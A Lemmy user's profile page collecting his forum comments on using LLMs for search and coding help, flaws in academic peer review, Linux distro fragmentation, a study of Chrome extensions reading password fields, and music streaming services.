Hi! I am Creesch, also creesch on other platforms :)

  • 0 Posts
  • 36 Comments
Joined 1 year ago
cake
Cake day: July 2nd, 2023

help-circle
  • What do you mean by “it”? The chatGPT interface? Could be, but then you are also missing the point I am making.

    After all, chatGPT is just one of the possible implementations of LLMs and indeed not perfect in how they implemented some things like search. In fact, I do think that they shot themselves in the foot by implementing search through bing and implementing it poorly. It basically is nothing more than a proof of concept tech demo.

    That doesn’t mean that LLM’s are useless for tasks like searching, it just means that you need to properly implement the functionality to make it possible. It certainly is possible to implement search functionality around LLMs that is both capable and can be reviewed by a human user to make sure it is not fucking up.

    Let me demonstrate. I am doing some steps that you would normally automate with conventional code:

    I started about by asking chatGPT a simple question.

    *“I want to provide a list of all the children bach had. What would be a suitable google query”

    It then responded with.

    “To compile a comprehensive list of Johann Sebastian Bach’s children, a suitable Google query would be: “List of Johann Sebastian Bach’s children names”. This query is specific enough to indicate that you’re looking for a detailed list, including the names of all the children, which should yield targeted results.”

    The following step I did manually, but is something you would normally have automated. I put the suggested query in google, I quickly grabbed the first 5 links and then put the following in chatGPT.

    The top 5 results in google are the pages I provided below. Browse to each page, and answer the query “List of Johann Sebastian Bach’s children names”. Just answer the query, but let me know if there is conflicting information on the page.

    https://en.wikipedia.org/wiki/Bach_family
    https://www.classicfm.com/composers/bach/guides/children/
    https://www.bachonbach.com/100-bach-faq-and-soon-there-are-500-bach-faq/faq-26-what-were-the-names-of-all-of-johann-sebastian-bach-s-kids/
    https://www.spiritsound.com/music/bachchildren.html
    https://www.grahamsmusic.net/post/bach-s-wives-and-children

    It then proceeded to give me the following answer

    Johann Sebastian Bach had 20 children in total. With his first wife, Maria Barbara Bach, he had seven children, four of whom survived into adulthood: Catharina Dorothea, Wilhelm Friedemann, Carl Philipp Emanuel, and Johann Gottfried Bernhard. With his second wife, Anna Magdalena Wilcke, he had 13 children, of whom six survived into adulthood: Gottfried Heinrich, Elisabeth Juliane Friederica, Johanna Carolina, Regina Susanna, Johann Christoph Friedrich, and Johann Christian

    Going over the search results myself seems to confirm this list. Most importantly, except for the initial input, all of this can be automated. And of course, a lot of it can be done better, as I didn’t want to spend too much time.




  • True, though that isn’t all that different from people doing knee jerk responses on the internet…

    I am not claiming they are perfect, but for the steps I described a human aware of the limitations is perfectly able to validate the outcome. While still having saved a bunch of time and effort on doing an initial search pass.

    All I am saying is that it is fine to be critical of LLM and AI claims in general as there is a lot of hype going on. But some people seem to lean towards the “they just suck, period” extreme end of the spectrum. Which is no longer being critical but just being a reverse fanboy/girl/person.


  • I don’t know how to say this in a less direct way. If this is your take then you probably should look to get slightly more informed about what LLMs can do. Specifically, what they can do if you combine them with with some code to fill the gaps.

    Things LLMs can do quite well:

    • Generate useful search queries.
    • Dig through provided text to determine what it contains.
    • Summarize text.

    These are all the building blocks for searching on the internet. If you are talking about local documents and such retrieval augmented generation (RAG) can be pretty damn useful.



  • For LLM training I do wonder if they assigned a weight, but I doubt it.

    Given my experience with models I think they might actually do assign a weight. Otherwise, I would get a lot more bogus results. It also isn’t as if it is that difficult to implement some basic, naive, weighing based on the amount of stars/forks/etc.

    Of course it might differ per model and how they are trained.

    Having said that, I wouldn’t trust the output from an LLM to write secure code either. For me it is a very valuable tool on the end of helping me debug issues on the scale of being a slightly more intelligent rubber ducky. But when you ask most models to create anything more than basic functions/methods you damn well make sure it actually does what it needs it to do.

    I suppose there is some role there for seniors to train juniors in how to properly use this new set of tooling. In the end it is very similar to having to deal with people who copy paste answers directly from stack overflow expecting it to magically fix their problem as well.

    The fact that you not only need your code/tool to work but also understand why and how it works is also something I am constantly trying to teach to juniors at my place. What I often end up asking them is something along the lines of “Do you want to have learned a trick that might be obsolete in a few years? Or do you want to have mastered a set of skills and understanding which allows you to tackle new challenges when they arrive?”.


  • Most code on GitHub either is unsecure, or it was written without needing to be secure.

    That is a bit of a stretch imho. There are myriads of open source projects hosted on github that do need to be secure in the context where they are used. I am curious how you came to that conclusion.

    I’m already getting pull requests from juniors trying to sneak in AI generated code without actually reading it.

    That is worrysome though. I assume these people have had some background/education in the field before they were hired?


  • I feel like two different problems are conflated into one though.

    1. The academic review process is broken.
    2. AI generated bullshit is going to cause all sorts of issues.

    Point two can contribute to point 1 but for that a bunch of stuff needs to happen. Correct my if I am wrong but as far as my understanding of peer-review processes are supposed to go it is something along the lines of:

    1. A researcher submits their manuscript to a journal.
    2. An editor of that journal validates the paper fits within the scope and aims of the journal. It might get rejected here or it gets send out for review.
    3. When it does get send out for review to several experts in the field, the actual peer reviewers. These are supposed to be knowledgeable about the specific topic the paper is about. These then read the paper closely and evaluate things like methodology, results, (lack of) data, and conclusions.
    4. Feedback goes to the editor, who then makes a call about the paper. It either gets accepted, revisions are required or it gets rejected.

    If at point 3 people don’t do the things I highlighted in bold then to me it seems like it is a bit silly to make this about AI. If at point 4 the editor ignores most feedback for the peer reviewers, then it again has very little to do with AI and everything the a base process being broken.

    To summarize, yes AI is going to fuck up a lot of information, it already has. But by just shouting, “AI is at it again with its antics!” at every turn instead of looking further and at other core issues we will only make things worse.

    Edit:

    To be clear, I am not even saying that peer reviewers or editors should “just do their job already”. But fake papers have been increasingly an issue for well over a decade as far as I am aware. The way the current peer review process works simply doesn’t seem to scale to where we are today. And yes, AI is not going to help with that, but it is still building upon something that already was broken before AI was used to abuse it.


  • I totally see why you are worried about all the aspects AI introduces, especially regarding bias and the authenticity of generated content. My main gripe, though, is with the oversight (or lack thereof) in the peer review process. If a journal can’t even spot AI-generated images, it raises red flags about the entire paper’s credibility, regardless of the content’s origin. It’s not about AI per se. It is about ensuring the integrity of scholarly work. Because realistically speaking, how much of the paper itself is actually good or valid? Even more interesting, and this would bring AI back in the picture. Is the entire paper even written by a human or is the entire thing fake? Or maybe that is also not interesting at all as there are already tons of papers published with other fake data in it. People that actually don’t give a shit about the academic process and just care about their names published somewhere likely already have employed other methods as well. I wouldn’t be surprised if there is a paper out there with equally bogus images created by an actual human for pennies on Fiverr.

    The crux of the matter is the robustness of the review process, which should safeguard against any form of dubious content, AI-generated or otherwise. Which is what I also said in my initial reply, I am most certainly not waving hands and saying that review is enough. I am saying that it is much more likely the review process has already failed miserably and most likely has been for a while.

    Which, again to me, seems like the bigger issue.


  • This feels like clickbait to me, as the fundamental problem clearly isn’t AI. At least to me it isn’t. The title would have worked as well without AI in the title. The fact that the images are AI generated isn’t even that relevant. What is worrying is that the peer review process, at least for this journal clearly is faulty as no actual review of the material took place.

    If we do want to talk about AI. I am impressed how well the model managed to actually create text made up of actual letters resembling words. From what I have seen so far that is often just as difficult for these models as hands are.


  • They’re for different needs.

    Yes… but also extremely no. Superficially you are right, but a lot of the arguments of why many new distros are created is just because of human nature. This covers everything from infighting over inane issues to more pragmatic reasons. A lot of them, probably even a majority, don’t provide enough actual differentiators to be able to honestly claim that it is because of different needs. In the end it all boils down to the fact that people can just create a new distro when they feel like it.

    Which is a strength in one way, but not with regard to fragmentation.


  • I am not quite sure why there are all these bullet points that have very little todo with the actually issue.

    Researchers at the University of Wisconsin–Madison found that Chrome browser extensions can still steal passwords, despite compliance with Chrome’s latest security standard, Manifest V3.

    I am not sure how Manifest V3 is relevant here? Nothing in Manifest V3 suggests that content_scripts can’t access the DOM.

    The core issue lies in the extensions’ full access to the Document Object Model (DOM) of web pages, allowing them to interact with text input fields like passwords.

    I’d also say this isn’t directly the issue. Yes, content_scripts needing an extra permissions to be able to access password input fields would help of course.

    Analysis of existing extensions showed that 12.5% had the permissions to exploit this vulnerability, identifying 190 extensions that directly access password fields.

    Yes… because accessing the DOM and interacting with it is what browser extensions do. If anything, that 12.5% feels low, so I am going to guess it is the combination of accessing the DOM and being able to phone home with that information.

    A proof of concept extension successfully passed the Chrome Web Store review process, demonstrating the vulnerability.

    This, to me, feels like the core of the issue right now. The behavior as described always has been part of browser extensions and Manifest V3 didn’t change that or made a claim in that direction as far as I know. So that isn’t directly relevant right now. I’d also say that firefox is just as much at risk here. Their review process over the years has changed a lot and isn’t always as thorough as people tend to think it is.

    Researchers propose two fixes: a JavaScript library for websites to block unwanted access to password fields, and a browser-level alert system for password field interactions.

    “A javascript library” is not going to do much against content_scripts of extensions accessing the DOM.

    The alert system seems better indeed, but that might as well become browser extension permission.

    To be clear, I am not saying that all is fine and there are no risks. I just think that the bullet point summary doesn’t really focus on the right things.





  • I am dissapointed in that I have not been able to get a single mathematic equation produced (like famous ones), but I know they can?

    Well, my understanding is that they actually can’t. LLM’s do “language” mostly based on what is called “next word prediction” so they basically look at the word and predict what the next most logical word would be. (Somewhat simplified). So numbers to them are not numbers but words, which is why they are fairly bad at them.

    Opera has Aria, which is like the cleanest version of ChatGPT

    Pass, not sure what stake the chinese owners have these days but Opera is a bit too… feature rich in everything.

    I do like working with just chat.openai.com for simple stuff. It is great at helping my debug things in areas I don’t quite have all the knowledge I’d like. For example, I had to work on a shell script earlier in bash. Something I don’t do often and as an added bonus it needed to work on both macOS machines and the bash version shipped with “git bash” on windows. MacOS GNU utils already function slightly differently at times, but git bash on windows is entirely broken in some areas. Where yesterday I spend an hour trying to find something relevant based on my input and the error I got through google chatGPT just managed to point out the pain point right away.

    And that is where I feel chatGPT (in this case anyway) does a great job, troubleshooting issues about things that are not necessarily bleeding edge. I just presented it with a clear problem and a bit of context and asked why that could be the case. It also got it wrong a few times, but that is fine, it did safe me a bunch of time in the end.


  • Bing and Google Bard keep disappointing me. Bing for some reason only picks up on half of what I ask. Which is extremely odd as it is supposedly is ChatGPT based and ChatGPT gives pretty good answers on the same queries. The only problem with the latter is that a lot of it is of course outdated.

    Bard might just be broken for me. I keep getting I'm a text-based AI, and that is outside of my capabilities. or similar responses.


  • Creesch@beehaw.orgtoAndroid@lemdro.idIs Tidal/Deezer worth it?
    link
    fedilink
    English
    arrow-up
    3
    arrow-down
    1
    ·
    1 year ago

    I realize you asked for other recommendations, but I suspect you don’t want to actually maintain your own music library but rather want streaming services recommended?

    Of the two alternatives you are currently looking for I do have experience with Deezer, although it has been two years at least. The music library is almost as complete as Spotify in my experience I rarely had issues with songs not being on there. The recommendation algorithm at the time was nice, but would sometimes get stuck in a hyper specific genre that would only reinforce itself.

    For HIFI audio you basically do need fairly good audio gear for it (decent wired headphones for example), I’d say that for most people it is not worth paying extra for as it is really difficult to tell the difference.

    One other service I have used is Youtube Music as it is included in premium. It does not have an HIFI option but otherwise is fairly okay. Basically worth looking into if you were also considering Youtube premium, but otherwise not really special.


  • Yeah, you raise some valid points about the future of reddit itself and communities being forced. A few things I specifically still want to reply to:

    I guess I also don’t get the concern about picking “the right lemmy instance” - at worst, it’s like picking an e-mail server, or grocery store. Try a random one, find out what doesn’t work for you (if anything) and then use that knowledge to evaluate the next one.

    Well yeah, but that is in hindsight easy to say. If all you have heard is “Lemmy” and you start looking things up it can become a bit overwhelming and dififcult to figure out. Also, ironically, because a lot of people are trying to put information out there. But, not everyone is good at actually creating easy to follow resources. Also, from a user perspective, you are entirely right. From a community perspective it is slightly more complex. You either need to find the money and people with technical know how to host your own instance or find a reliable instance that allows community creation.

    I tend to quote and comment on the part of a comment I’m replying to that I have something to say about it.

    On reddit I, personally, also wouldn’t have assumed that to be the intent. Often because that is not what is happening. What I often do when I just want to reply to something specific is stating it. Something along the lines of “I generally agree with your post/comment, but this part specifically, I do have a slightly different view of” and then follow with the quote.

    this is a rant (so don’t take it that seriously)

    Heh, some people want their rants to be taken very seriously :) So again, just add it as context. Not just state that it is a rant, but that because of it is doesn’t have to be taken seriously.